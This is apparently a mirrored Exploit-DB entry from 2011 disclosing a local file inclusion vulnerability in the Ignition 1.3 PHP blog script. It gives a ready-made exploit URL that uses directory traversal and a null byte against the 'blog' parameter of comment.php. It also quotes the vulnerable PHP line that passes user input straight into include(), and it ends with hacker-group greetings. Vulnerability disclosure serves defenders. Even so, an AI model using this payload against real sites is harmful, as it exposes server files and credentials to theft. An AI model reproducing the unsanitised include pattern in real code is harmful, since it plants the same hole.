- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15917
- Проверка EDB
-
- Пройдено
- Автор
- N0N0X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2011-01-06
Код:
#######################################################
#Ignition 1.3 <=== Local File Include
#######################################################
#By n0n0x
#Homepage: http://priasantai.uni.cc/
#Download script :http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz
#######################################################
=========================================
xpl :
http://site.com/comment.php?blog=../../../../../../../../../../LFI%00
<?php
session_start();
require ('data/settings.php');
include ('data/posts/'.$_GET['blog'].'.txt'); <== LFI vuln
?>
=========================================
#######################################################
#Greetz: all member | manadocoding.org - sekuritiOnline.net
#
# friends: angky.tatoki, EA ngel, bL4Ck_3n91n3, 0pa, x0r0n, team_elite, thama,
# devilbat, cr4wl3r, cyberl0g, lumut-, Anti_Hack, DskyMC, mr.c, doniskynet
######################################################- Источник
- www.exploit-db.com
